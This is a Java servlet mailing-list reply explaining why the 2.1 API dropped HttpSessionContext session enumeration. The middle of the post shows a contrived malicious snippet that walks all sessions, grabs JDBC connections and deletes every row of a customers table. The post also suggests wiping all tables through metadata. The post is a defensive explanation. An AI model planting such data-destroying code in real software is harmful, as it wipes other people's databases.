"Jain, Hursh" wrote:
> Yeah, but why is this a security issue ? Servlets are server side so aren't
> you in control over all the code ? And suppose you do decide to use a
> third party servlet. Wouldn't you get that servlet from a reputable company
> ?
> Or maybe get source along with the servlet ?
>
> I mean this is not like applets where any code could run in your browser. In
> servlets, you carefully control the code that runs in your environment.
>
> I don't have experience with HttpSessionContext, so if this is a naive
> question,
> my apologies...
>
> Best regards,
>
> --Hursh
Do you ever run any third party code that you've either purchased or acquired?
Do you check the source code thoroughly even if it is available? (What
percentage of Linux users have ever looked at a single line of the OS source
code, even though it's right there on the distribution CD?)
Consider what happens to your database if a third party servlet you happen to
use has some code like this contrived example, triggered by some event that is
not obvious (this code was legal under the 2.0 API -- under the 2.1 API it will
compile but not damage you at runtime):
HttpSession session = request.getSession(true);
HttpSessionContext sessContext = session.getSessionContext();
Enumeration ids = sessContext.getIds(); // All the active session IDs
while (ids.hasNextElement()) {
String id = ids.nextElement(); // Next session ID
HttpSession sess = sessContext.getSession(id); // Get that session
String names[] = sess.getValueNames();
for (int i = 0; i < names.length; i++) {
Object value = sess.getValue(names[i]);
if (value instanceof java.sql.Connection) {
try { // If this is a JDBC connection, try to do something
nasty
java.sql.Connection conn = (java.sql.Connection) value;
java.sql.Statement stmt =
conn.createStatement("delete from customers");
stmt.executeUpdate();
stmt.close();
} catch (java.sql.SQLException e) {
;
}
}
}
}
If you happen to have a table called customers, it no longer has any rows in
it. A more realistic malicious program could use the JDBC "meta data"
facilities to find the names of all accessible tables and delete all the rows in
all of them -- roughly the database equivalent of runnimg "rm -rf *" at the
top-level directory of a Unix system when logged on as root.
This would be just as fertile a ground for viruses as the Microsoft Office
macros that allowed Melissa and all of its clones. Removing the ability to list
all the active sessions protects you from this, even in third party code.
Craig McClanahan
___________________________________________________________________________
To unsubscribe, send email to [EMAIL PROTECTED] and include in the body
of the message "signoff SERVLET-INTEREST".
Archives: http://archives.java.sun.com/archives/servlet-interest.html
Resources: http://java.sun.com/products/servlet/external-resources.html
LISTSERV Help: http://www.lsoft.com/manuals/user/user.html
